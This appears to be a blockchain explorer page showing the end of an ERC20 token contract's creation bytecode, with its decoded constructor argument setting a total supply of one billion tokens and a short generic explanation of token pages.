050565b5f6020820190508181035f83015261214a81612111565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f6121ab602283611772565b91506121b682612151565b604082019050919050565b5f6020820190508181035f8301526121d88161219f565b9050919050565b5f6121e982611856565b91506121f483611856565b925082820390508181111561220c5761220b611c19565b5b92915050565b7f426c61636b6c69737465640000000000000000000000000000000000000000005f82015250565b5f612246600b83611772565b915061225182612212565b602082019050919050565b5f6020820190508181035f8301526122738161223a565b9050919050565b7f74726164696e67206973206e6f742073746172746564000000000000000000005f82015250565b5f6122ae601683611772565b91506122b98261227a565b602082019050919050565b5f6020820190508181035f8301526122db816122a2565b9050919050565b7f466f7262696400000000000000000000000000000000000000000000000000005f82015250565b5f612316600683611772565b9150612321826122e2565b602082019050919050565b5f6020820190508181035f8301526123438161230a565b905091905056fea2646970667358221220142e1915218782ff5d88d8d7cf0c471b5a9e7dc87de8b06a035fa49595d459c364736f6c63430008190033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000003b9aca00

-----Decoded View---------------
Arg [0] : _totalSupply (uint256): 1000000000

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000000000000000000000000000000000003b9aca00


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.